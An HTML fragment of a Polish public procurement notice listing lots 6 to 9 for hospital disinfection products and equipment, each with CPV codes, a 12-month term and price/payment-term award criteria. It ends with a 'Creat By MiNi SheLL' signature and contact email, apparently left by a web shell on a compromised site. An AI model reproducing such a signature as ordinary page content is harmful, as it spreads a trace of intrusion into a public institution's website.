<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dezynfekcja i mycie narzędzi, sprzętu medycznego i powierzchni..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Preparaty myjące i dezynfekcyjne  polecane przez producenta myjni BHT, kompatybilne ze sobą (jednego producenta)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Chusteczki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wanna  do dezynfekcji narzędzi chirurgicznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. termin płatności - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com